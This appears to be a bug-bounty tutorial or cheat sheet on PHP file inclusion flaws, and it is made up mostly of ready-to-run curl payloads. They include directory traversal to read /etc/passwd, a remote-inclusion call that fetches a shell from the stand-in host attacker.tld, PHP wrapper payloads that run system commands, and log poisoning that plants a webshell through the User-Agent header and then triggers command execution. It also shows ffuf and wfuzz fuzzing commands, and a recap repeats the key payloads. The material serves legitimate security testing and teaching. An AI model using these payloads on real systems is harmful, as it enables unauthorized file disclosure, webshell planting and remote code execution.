File Inclusion bugs are the web’s skeleton keys. One sloppy include($_GET['page']) and suddenly you’re pulling /etc/passwd, dropping webshells, or hijacking logs. They’re old-school, but they still bleed into bug bounty programs — especially in legacy apps, unfiltered dev panels, and forgotten PHP endpoints.

What is File Inclusion?
File Inclusion occurs when a web application loads files based on user input without proper sanitization.

• Local File Inclusion (LFI): Attacker loads a file from the local filesystem.

• Remote File Inclusion (RFI): Attacker loads a file from a remote server.

• Common consequences: Source code disclosure, sensitive config leaks, log poisoning, and sometimes RCE.

LFI Basics

# Simple traversal
curl "http://target.tld/index.php?page=../../../../etc/passwd"

# With URL encoding
curl "http://target.tld/index.php?page=..%2f..%2f..%2f..%2fetc/passwd"

# With double URL encoding
curl "http://target.tld/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd"

Targets: /etc/passwd, /etc/hosts, Apache/nginx logs, application config files, Windows boot.ini or win.ini.

RFI Basics

# Point to external server hosting payload.php
curl "http://target.tld/index.php?page=http://attacker.tld/shell.txt"

Note: Most modern PHP installs have allow_url_include=0, so RFI is rarer in the wild. But still useful in CTFs and legacy bounty targets.

Wrappers (PHP Specific)

# PHP filter wrapper to read source code
curl "http://target.tld/index.php?page=php://filter/convert.base64-encode/resource=index.php"

# Expect wrapper
curl "http://target.tld/index.php?page=expect://id"

# Data wrapper
curl "http://target.tld/index.php?page=data://text/plain,<?php system('id'); ?>"

Exploitation Escalation

• Log Poisoning: Inject PHP into Apache/Nginx logs via User-Agent, then LFI to include the log.

# Malicious User-Agent
curl -A "<?php system($_GET['cmd']); ?>" http://target.tld/
# Trigger inclusion
curl "http://target.tld/index.php?page=../../../../var/log/apache2/access.log&cmd=id"

• Session Poisoning: If app stores sessions in /tmp/sess_*, you can poison them.

Automation & Discovery

# ffuf brute force params that might trigger inclusion
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-params.txt:FUZZ \
  -u "http://target.tld/index.php?FUZZ=../../../../etc/passwd"

# wfuzz variant
wfuzz -c -z file,params.txt \
  "http://target.tld/index.php?FUZZ=../../../../etc/passwd"

Bug Bounty Context

• LFI is often dismissed as “just file read” — but chaining makes it bounty-worthy:

  • LFI → source code → DB creds → SQL takeover.

  • LFI → log poisoning → RCE.

  • LFI → /proc/self/environ → code execution on misconfigured PHP.

• Even read-only LFI can be high-impact if you leak sensitive configs (API keys, cloud creds).

References

• OWASP Testing Guide: https://owasp.org/www-community/attacks/Path_Traversal

• PayloadAllTheThings (File Inclusion): https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

• HackTricks LFI: https://book.hacktricks.xyz/pentesting-web/file-inclusion

Command Recap

# LFI basic
curl "http://target.tld/index.php?page=../../../../etc/passwd"

# RFI basic
curl "http://target.tld/index.php?page=http://attacker.tld/shell.txt"

# PHP filter wrapper
curl "http://target.tld/index.php?page=php://filter/convert.base64-encode/resource=index.php"

# Log poisoning
curl -A "<?php system($_GET['cmd']); ?>" http://target.tld/
curl "http://target.tld/index.php?page=../../../../var/log/apache2/access.log&cmd=id"

Final Thoughts
File Inclusion is proof that old bugs never die — they just get re-skinned. Spot the unfiltered include, and you’re already halfway to root.